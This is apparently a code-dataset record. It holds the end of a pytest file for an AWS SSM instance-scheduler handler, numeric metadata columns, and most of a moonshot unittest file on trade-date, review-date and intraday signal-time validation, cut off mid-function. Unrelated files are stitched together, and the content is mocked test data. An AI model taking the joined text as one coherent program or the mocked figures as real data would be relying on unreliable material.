        stopped_tags=[{"Key": "ScheduleStopped", "Value": "Date-time-message"}],
    )
    runbook_mock = mocker.patch.object(handler, "run_ssm_runbook")
    runbook_mock.return_value = "aaas"
    response = handler.run_rds_clusters_document("Schedule", "office-hours-uk", "running")
    assert runbook_mock.call_count == 1
    runbook_mock.assert_has_calls(
        [call("RDS_CLUSTERS_START_SSM_DOC", "Schedule", "office-hours-uk", started_tags)]
    )
    assert response == "aaas"
def test_start_run_ec2_document(mocker):
    """Desired state 'running' routes to the EC2 *start* runbook with the started tags."""
    started_tags = [{"Key": "ScheduleStarted", "Value": "Date-time-message"}]
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4, 5, 6],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=started_tags,
        stopped_tags=[{"Key": "ScheduleStopped", "Value": "Date-time-message"}],
    )
    runbook_mock = mocker.patch.object(handler, "run_ssm_runbook")
    runbook_mock.return_value = "aaas"
    response = handler.run_ec2_instances_document("Schedule", "office-hours-uk", "running")
    assert runbook_mock.call_count == 1
    runbook_mock.assert_has_calls(
        [call("EC2_START_SSM_DOC", "Schedule", "office-hours-uk", started_tags)]
    )
    assert response == "aaas"
def test_stop_run_ec2_document(mocker):
    """Desired state 'stopped' routes to the EC2 *stop* runbook with the stopped tags."""
    stopped_tags = [{"Key": "ScheduleStopped", "Value": "Date-time-message"}]
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4, 5, 6],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=[{"Key": "ScheduleStarted", "Value": "Date-time-message"}],
        stopped_tags=stopped_tags,
    )
    runbook_mock = mocker.patch.object(handler, "run_ssm_runbook")
    runbook_mock.return_value = "aaas"
    response = handler.run_ec2_instances_document("Schedule", "office-hours-uk", "stopped")
    assert runbook_mock.call_count == 1
    runbook_mock.assert_has_calls(
        [call("EC2_STOP_SSM_DOC", "Schedule", "office-hours-uk", stopped_tags)]
    )
    assert response == "aaas"
def test_get_tags_in_json_formatted_string_for_rds():
    """For RDS documents, tags are flattened into a single {key: value} JSON object."""
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4, 5, 6],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=[{"Key": "ScheduleStarted", "Value": "Date-time-message"}],
        stopped_tags=[{"Key": "ScheduleStopped", "Value": "Date-time-message"}],
    )
    tags = [{"Key": "ScheduleStarted", "Value": "Date-time-message"}]
    response = handler.get_tags_in_json_formatted_string("RDS_CLUSTERS_START_SSM_DOC", tags)
    assert len(response) == 1
    assert response[0] == '{"ScheduleStarted": "Date-time-message"}'
def test_get_tags_in_json_formatted_string_for_rds_empty():
    """With no tags supplied, RDS documents fall back to the default StateChanged tag."""
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4, 5, 6],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=[{"Key": "ScheduleStarted", "Value": "Date-time-message"}],
        stopped_tags=[{"Key": "ScheduleStopped", "Value": "Date-time-message"}],
    )
    response = handler.get_tags_in_json_formatted_string("RDS_CLUSTERS_START_SSM_DOC", [])
    assert len(response) == 1
    assert response[0] == '{"StateChanged": "Resource started by Instance Scheduler"}'
def test_get_tags_in_json_formatted_string_for_ec2():
    """For EC2 documents, tags keep the native {"Key": ..., "Value": ...} shape."""
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4, 5, 6],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=[{"Key": "ScheduleStarted", "Value": "Date-time-message"}],
        stopped_tags=[{"Key": "ScheduleStopped", "Value": "Date-time-message"}],
    )
    tags = [{"Key": "ScheduleStarted", "Value": "Date-time-message"}]
    response = handler.get_tags_in_json_formatted_string("EC2_STOP_SSM_DOC", tags)
    assert len(response) == 1
    assert response[0] == '{"Key": "ScheduleStarted", "Value": "Date-time-message"}'
def test_get_tags_in_json_formatted_string_for_ec2_empty():
    """With no tags supplied, EC2 documents fall back to the default StateChanged tag."""
    handler = SSMHandler(
        accounts=[0, 1, 2, 3, 4, 5, 6],
        automation_assume_role_arn="test_role",
        execution_role_name="test_role",
        logger=get_logger(),
        regions=["us-east-1", "us-east-2"],
        started_tags=[{"Key": "ScheduleStarted", "Value": "Date-time-message"}],
        stopped_tags=[{"Key": "ScheduleStopped", "Value": "Date-time-message"}],
    )
    response = handler.get_tags_in_json_formatted_string("EC2_STOP_SSM_DOC", [])
    assert len(response) == 1
    assert response[0] == '{"Key": "StateChanged", "Value": "Resource started by Instance Scheduler"}'
| 48.369128
| 208
| 0.621965
| 1,709
| 14,414
| 4.971913
| 0.099473
| 0.039543
| 0.074144
| 0.096505
| 0.905261
| 0.895963
| 0.89361
| 0.888902
| 0.888196
| 0.879722
| 0
| 0.019529
| 0.207784
| 14,414
| 297
| 209
| 48.531987
| 0.724582
| 0.081518
| 0
| 0.717054
| 0
| 0
| 0.303644
| 0.037368
| 0
| 0
| 0
| 0
| 0.135659
| 1
| 0.054264
| false
| 0
| 0.015504
| 0
| 0.073643
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7e0e268a28ba03826471b2b62ef2d8407077ac0f
| 61,691
|
py
|
Python
|
tests/test_trade_date_validation.py
|
windblood/moonshot
|
d79cf26e7fb5ce3fcb34060771ea4992e19dc46a
|
[
"Apache-2.0"
] | 122
|
2017-09-14T01:17:56.000Z
|
2022-02-25T11:59:04.000Z
|
tests/test_trade_date_validation.py
|
windblood/moonshot
|
d79cf26e7fb5ce3fcb34060771ea4992e19dc46a
|
[
"Apache-2.0"
] | null | null | null |
tests/test_trade_date_validation.py
|
windblood/moonshot
|
d79cf26e7fb5ce3fcb34060771ea4992e19dc46a
|
[
"Apache-2.0"
] | 39
|
2017-10-24T14:36:54.000Z
|
2022-02-20T01:04:03.000Z
|
# Copyright 2018 QuantRocket LLC - All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# To run: python3 -m unittest discover -s tests/ -p test_*.py -t . -v
import unittest
from unittest.mock import patch
import pandas as pd
import datetime
import pytz
from moonshot import Moonshot
from moonshot.exceptions import MoonshotError
class TradeDateValidationTestCase(unittest.TestCase):
def test_complain_if_stale_date(self):
"""
Tests error handling when data is older than today.
"""
class BuyBelow10(Moonshot):
"""
A basic test strategy that buys below 10.
"""
CODE = "buy-below-10"
def prices_to_signals(self, prices):
signals = prices.loc["Close"] < 10
return signals.astype(int)
# Daily prices end 2018-05-03, so today's signal date can never be found.
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01", "2018-05-02", "2018-05-03"])
fields = ["Close"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9,
11,
10.50
],
"FI23456": [
# Close
9.89,
11,
8.50,
],
},
index=idx
)
return prices
# Minimal securities master: two US stocks in the New York timezone.
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
# Trading against stale data must raise MoonshotError mentioning the max date.
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
with self.assertRaises(MoonshotError) as cm:
BuyBelow10().trade({"U123": 1.0})
self.assertIn((
"expected signal date {0} not found in target weights DataFrame, is "
"the underlying data up-to-date? (max date is 2018-05-03").format(
pd.Timestamp.today(tz="America/New_York").date()), repr(cm.exception))
def test_complain_if_stale_date_continuous_intraday(self):
"""
Tests error handling when data is older than today on a continuous intraday strategy.
"""
class BuyBelow10ShortAbove10ContIntraday(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
CODE = "c-intraday-pivot-10"
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
# Intraday prices cover only 2018-05-01/02, so today's signal date is absent.
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02"])
fields = ["Close"]
times = ["10:00:00", "11:00:00", "12:00:00"]
idx = pd.MultiIndex.from_product(
[fields, dt_idx, times], names=["Field", "Date", "Time"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9.6,
10.45,
10.12,
15.45,
8.67,
12.30,
],
"FI23456": [
# Close
10.56,
12.01,
10.50,
9.80,
13.40,
7.50,
],
},
index=idx
)
return prices
# Minimal securities master: two US stocks in the New York timezone.
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
# Trading against stale intraday data must raise MoonshotError mentioning the max date.
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with self.assertRaises(MoonshotError) as cm:
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
BuyBelow10ShortAbove10ContIntraday().trade({"U123": 1.0})
self.assertIn((
"expected signal date {0} not found in target weights DataFrame, is "
"the underlying data up-to-date? (max date is 2018-05-02").format(
pd.Timestamp.today(tz="America/New_York").date()), repr(cm.exception))
def test_complain_if_no_times_on_signal_date_before_trade_time_continuous_intraday(self):
    """
    Tests error handling when there are no times on the signal date that
    are before the trade time.

    Note: it's unclear whether this error condition could be triggered in
    the real world unless review_date is passed improperly, which is
    covered by a separate test.
    """
    # (An unused BuyBelow1 helper class from the original was removed; this
    # test only exercises the continuous intraday strategy below.)
    class BuyBelow10ShortAbove10ContIntraday(Moonshot):
        """
        A basic test strategy that buys below 10 and shorts above 10.
        """
        CODE = "c-intraday-pivot-10"

        def prices_to_signals(self, prices):
            long_signals = prices.loc["Close"] <= 10
            short_signals = prices.loc["Close"] > 10
            signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
            return signals

    # Two days of three intraday bars each (10:00, 11:00, 12:00).
    def mock_get_prices(*args, **kwargs):
        dt_idx = pd.DatetimeIndex(["2018-05-01", "2018-05-02"])
        fields = ["Close"]
        times = ["10:00:00", "11:00:00", "12:00:00"]
        idx = pd.MultiIndex.from_product(
            [fields, dt_idx, times], names=["Field", "Date", "Time"])
        prices = pd.DataFrame(
            {
                "FI12345": [
                    # Close
                    9.6,
                    10.45,
                    10.12,
                    15.45,
                    8.67,
                    12.30,
                ],
                "FI23456": [
                    # Close
                    10.56,
                    12.01,
                    10.50,
                    9.80,
                    13.40,
                    7.50,
                ],
            },
            index=idx
        )
        return prices

    # Minimal securities master: two US stocks in the New York timezone.
    def mock_download_master_file(f, *args, **kwargs):
        master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
        securities = pd.DataFrame(
            {
                "FI12345": [
                    "America/New_York",
                    "STK",
                    "USD",
                    None,
                    None
                ],
                "FI23456": [
                    "America/New_York",
                    "STK",
                    "USD",
                    None,
                    None,
                ]
            },
            index=master_fields
        )
        securities.columns.name = "Sid"
        securities.T.to_csv(f, index=True, header=True)
        f.seek(0)

    def mock_pd_timestamp_now(tz=None):
        # Freeze "now" at 09:55:53 New York time — earlier than the first
        # intraday bar (10:00:00) — so no time on the signal date precedes
        # the trade time.
        if tz == "America/New_York":
            return pd.Timestamp("2018-05-02 09:55:53", tz=tz)
        elif tz:
            # Bug fix: datetime.now() takes ``tz``, not ``tzinfo``; the
            # original raised TypeError whenever this branch was executed.
            return datetime.datetime.now(tz=pytz.timezone(tz))
        else:
            return datetime.datetime.now()

    with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
        with patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now):
            with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
                with self.assertRaises(MoonshotError) as cm:
                    BuyBelow10ShortAbove10ContIntraday().trade({"U123": 1.0})

    # The plain (non-review-date) message must not suggest adjusting review_date.
    self.assertIn((
        "cannot determine which target weights to use for orders because target weights "
        "DataFrame contains no times earlier than trade time 09:55:53 "
        "for signal date 2018-05-02"), repr(cm.exception))
    self.assertNotIn("please adjust the review_date", repr(cm.exception))
def test_complain_if_no_times_on_signal_date_before_trade_time_and_suggest_review_date_continuous_intraday(self):
"""
Tests error handling when there are no times on the signal date that
are before the trade time, and a review date was passed.
"""
# NOTE(review): BuyBelow1 is defined but never used by this test.
class BuyBelow1(Moonshot):
"""
A basic test strategy that buys below 1.
"""
CODE = "buy-below-1"
def prices_to_signals(self, prices):
signals = prices.loc["Close"] < 1
return signals.astype(int)
class BuyBelow10ShortAbove10ContIntraday(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
CODE = "c-intraday-pivot-10"
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
# Prices end today (normalized to midnight), matching the review_date below.
def mock_get_prices(*args, **kwargs):
dt_idx = pd.date_range(end=pd.Timestamp.today(tz="America/New_York"), periods=2, normalize=True).tz_localize(None)
fields = ["Close"]
times = ["10:00:00", "11:00:00", "12:00:00"]
idx = pd.MultiIndex.from_product(
[fields, dt_idx, times], names=["Field", "Date", "Time"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9.6,
10.45,
10.12,
15.45,
8.67,
12.30,
],
"FI23456": [
# Close
10.56,
12.01,
10.50,
9.80,
13.40,
7.50,
],
},
index=idx
)
return prices
# Minimal securities master: two US stocks in the New York timezone.
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
# A date-only review_date implies trade time 00:00:00, which precedes every bar,
# so the error must suggest adjusting the review_date.
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
with self.assertRaises(MoonshotError) as cm:
review_date = pd.Timestamp.today().date().isoformat()
BuyBelow10ShortAbove10ContIntraday().trade({"U123": 1.0},
review_date=review_date)
self.assertIn((
"cannot determine which target weights to use for orders because target weights "
"DataFrame contains no times earlier than trade time 00:00:00 "
"for signal date {0}, please adjust the review_date".format(review_date)),
repr(cm.exception))
def test_complain_if_stale_time_continuous_intraday(self):
"""
Tests error handling on a continuous intraday strategy when data is
available for the signal date but is older than the signal time.
"""
class BuyBelow10ShortAbove10ContIntraday(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
CODE = "c-intraday-pivot-10"
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
# The 12:00:00 bar on 2018-05-02 is None for both fields, so the latest
# usable time on the signal date is 11:00:00.
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02"])
fields = ["Close","Volume"]
times = ["10:00:00", "11:00:00", "12:00:00"]
idx = pd.MultiIndex.from_product(
[fields, dt_idx, times], names=["Field", "Date", "Time"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9.6,
10.45,
10.12,
15.45,
8.67,
None,
# Volume,
10000,
20000,
15000,
15400,
15670,
None
],
"FI23456": [
# Close
10.56,
12.01,
10.50,
9.80,
13.40,
None,
# Volume,
30000,
40000,
55000,
65400,
35670,
None
],
},
index=idx
)
return prices
# Minimal securities master: two US stocks in the New York timezone.
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
# A 12:05:13 review_date requires the 12:00:00 bar, which is missing —
# expect a stale-time MoonshotError naming the max available time.
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
with self.assertRaises(MoonshotError) as cm:
BuyBelow10ShortAbove10ContIntraday().trade(
{"U123": 1.0}, review_date="2018-05-02 12:05:13")
self.assertIn((
"no 12:00:00 data found in prices DataFrame for signal date 2018-05-02, "
"is the underlying data up-to-date? (max time for 2018-05-02 "
"is 11:00:00)"), repr(cm.exception))
def test_review_date(self):
"""
Tests the use of review date to generate orders for earlier dates.
"""
class BuyBelow10(Moonshot):
"""
A basic test strategy that buys below 10.
"""
CODE = "buy-below-10"
def prices_to_signals(self, prices):
signals = prices.loc["Close"] < 10
return signals.astype(int)
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01", "2018-05-02", "2018-05-03"])
fields = ["Close"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9,
11,
10.50
],
"FI23456": [
# Close
9.89,
11,
8.50,
],
},
index=idx
)
return prices
# Minimal securities master: two US stocks in the New York timezone.
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
# 55K USD account with a 1:1 exchange rate, no open positions or orders.
def mock_download_account_balances(f, **kwargs):
balances = pd.DataFrame(dict(Account=["U123"],
NetLiquidation=[55000],
Currency=["USD"]))
balances.to_csv(f, index=False)
f.seek(0)
def mock_download_exchange_rates(f, **kwargs):
rates = pd.DataFrame(dict(BaseCurrency=["USD"],
QuoteCurrency=["USD"],
Rate=[1.0]))
rates.to_csv(f, index=False)
f.seek(0)
def mock_list_positions(**kwargs):
return []
def mock_download_order_statuses(f, **kwargs):
pass
# Generate orders as of two different review dates; each should reflect
# the signals available on that historical date.
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
orders_20180503 = BuyBelow10().trade({"U123": 1.0}, review_date="2018-05-03")
orders_20180501 = BuyBelow10().trade({"U123": 1.0}, review_date="2018-05-01")
self.assertSetEqual(
set(orders_20180503.columns),
{'Sid',
'Account',
'Action',
'OrderRef',
'TotalQuantity',
'OrderType',
'Tif'}
)
self.assertListEqual(
orders_20180503.to_dict(orient="records"),
[
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'BUY',
'OrderRef':
'buy-below-10',
# 1.0 allocation * 1.0 weight * 55K / 8.50
'TotalQuantity': 6471,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
self.assertListEqual(
orders_20180501.to_dict(orient="records"),
[
{
'Sid': "FI12345",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'buy-below-10',
# 1.0 allocation * 0.5 weight * 55K / 9
'TotalQuantity': 3056,
'OrderType': 'MKT',
'Tif': 'DAY'
},
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'buy-below-10',
# 1.0 allocation * 0.5 weight * 55K / 9.89
'TotalQuantity': 2781,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
def test_review_date_continuous_intraday(self):
"""
Tests the use of review date on a continuous intraday strategy to generate orders for earlier dates.
"""
class BuyBelow10ShortAbove10ContIntraday(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
CODE = "c-intraday-pivot-10"
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02"])
fields = ["Close"]
times = ["10:00:00", "11:00:00", "12:00:00"]
idx = pd.MultiIndex.from_product(
[fields, dt_idx, times], names=["Field", "Date", "Time"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9.6,
10.45,
10.12,
15.45,
8.67,
12.30,
],
"FI23456": [
# Close
10.56,
12.01,
10.50,
9.80,
13.40,
7.50,
],
},
index=idx
)
return prices
# Minimal securities master: two US stocks in the New York timezone.
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
# 60K USD account with a 1:1 exchange rate, no open positions or orders.
def mock_download_account_balances(f, **kwargs):
balances = pd.DataFrame(dict(Account=["U123"],
NetLiquidation=[60000],
Currency=["USD"]))
balances.to_csv(f, index=False)
f.seek(0)
def mock_download_exchange_rates(f, **kwargs):
rates = pd.DataFrame(dict(BaseCurrency=["USD"],
QuoteCurrency=["USD"],
Rate=[1.0]))
rates.to_csv(f, index=False)
f.seek(0)
def mock_list_positions(**kwargs):
return []
def mock_download_order_statuses(f, **kwargs):
pass
# Review dates mid-morning select the most recent bar at or before that
# time (10:00 bar for 10:05, 11:00 bar for 11:30).
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
orders_10 = BuyBelow10ShortAbove10ContIntraday().trade(
{"U123": 1.0}, review_date="2018-05-01 10:05:00")
orders_11 = BuyBelow10ShortAbove10ContIntraday().trade(
{"U123": 1.0}, review_date="2018-05-01 11:30:35")
self.assertSetEqual(
set(orders_10.columns),
{'Sid',
'Account',
'Action',
'OrderRef',
'TotalQuantity',
'OrderType',
'Tif'}
)
self.assertListEqual(
orders_10.to_dict(orient="records"),
[
{
'Sid': "FI12345",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'c-intraday-pivot-10',
# 1.0 allocation * 0.5 weight * 60K / 9.60 = 3125
'TotalQuantity': 3125,
'OrderType': 'MKT',
'Tif': 'DAY'
},
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'SELL',
'OrderRef': 'c-intraday-pivot-10',
# 1.0 allocation * 0.5 weight * 60K / 10.56 = 2841
'TotalQuantity': 2841,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
self.assertListEqual(
orders_11.to_dict(orient="records"),
[
{
'Sid': "FI12345",
'Account': 'U123',
'Action': 'SELL',
'OrderRef': 'c-intraday-pivot-10',
# 1.0 allocation * 0.5 weight * 60K / 10.45 = 2871
'TotalQuantity': 2871,
'OrderType': 'MKT',
'Tif': 'DAY'
},
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'SELL',
'OrderRef': 'c-intraday-pivot-10',
# 1.0 allocation * 0.5 weight * 60K / 12.01 = 2498
'TotalQuantity': 2498,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
def test_continuous_intraday(self):
"""
Tests that the latest signal date and signal time are used on a
continuous intraday strategy to generate orders.
"""
class BuyBelow10ShortAbove10ContIntraday(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
CODE = "c-intraday-pivot-10"
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
# Bars are timestamped relative to the real wall clock (1 and 2 minutes
# ago) so the most recent bar is always the tradeable one.
def mock_get_prices(*args, **kwargs):
now = pd.Timestamp.now(tz="America/New_York").tz_localize(None)
dt_idx = pd.date_range(end=now, periods=2, normalize=True)
fields = ["Close"]
first_time = (now - pd.Timedelta(seconds=120)).strftime("%H:%M:00")
second_time = (now - pd.Timedelta(seconds=60)).strftime("%H:%M:00")
times = [first_time, second_time]
idx = pd.MultiIndex.from_product(
[fields, dt_idx, times], names=["Field", "Date", "Time"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9.6,
10.45,
15.45,
8.67,
],
"FI23456": [
# Close
10.56,
12.01,
9.80,
13.40,
],
},
index=idx
)
return prices
# Minimal securities master: two US stocks in the New York timezone.
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
# 60K USD account with a 1:1 exchange rate, no open positions or orders.
def mock_download_account_balances(f, **kwargs):
balances = pd.DataFrame(dict(Account=["U123"],
NetLiquidation=[60000],
Currency=["USD"]))
balances.to_csv(f, index=False)
f.seek(0)
def mock_download_exchange_rates(f, **kwargs):
rates = pd.DataFrame(dict(BaseCurrency=["USD"],
QuoteCurrency=["USD"],
Rate=[1.0]))
rates.to_csv(f, index=False)
f.seek(0)
def mock_list_positions(**kwargs):
return []
def mock_download_order_statuses(f, **kwargs):
pass
# Orders should come from the latest bar: FI12345 closed 8.67 (buy),
# FI23456 closed 13.40 (sell short).
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
orders = BuyBelow10ShortAbove10ContIntraday().trade({"U123": 1.0})
self.assertSetEqual(
set(orders.columns),
{'Sid',
'Account',
'Action',
'OrderRef',
'TotalQuantity',
'OrderType',
'Tif'}
)
self.assertListEqual(
orders.to_dict(orient="records"),
[
{
'Sid': "FI12345",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'c-intraday-pivot-10',
# 1.0 allocation * 0.5 weight * 60K / 8.67 = 3460
'TotalQuantity': 3460,
'OrderType': 'MKT',
'Tif': 'DAY'
},
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'SELL',
'OrderRef': 'c-intraday-pivot-10',
# 1.0 allocation * 0.5 weight * 60K / 13.40 = 2239
'TotalQuantity': 2239,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
def test_signal_date_from_timezone(self):
    """
    Tests that the signal date is derived from the TIMEZONE, if set.
    """
    class BuyBelow1(Moonshot):
        """
        A basic test strategy that buys below 1.
        """
        CODE = "buy-below-1"
        # Strategy timezone deliberately differs from the securities'
        # New York timezone — it must win when deriving the signal date.
        TIMEZONE = "America/Mexico_City"

        def prices_to_signals(self, prices):
            signals = prices.loc["Close"] < 1
            return signals.astype(int)

    def mock_get_prices(*args, **kwargs):
        dt_idx = pd.DatetimeIndex(["2018-05-01", "2018-05-02", "2018-05-03"])
        fields = ["Close"]
        idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
        prices = pd.DataFrame(
            {
                "FI12345": [
                    # Close
                    9,
                    11,
                    10.50
                ],
                "FI23456": [
                    # Close
                    9.89,
                    0.99,
                    8.50,
                ],
            },
            index=idx
        )
        return prices

    # Minimal securities master: two US stocks in the New York timezone.
    def mock_download_master_file(f, *args, **kwargs):
        master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
        securities = pd.DataFrame(
            {
                "FI12345": [
                    "America/New_York",
                    "STK",
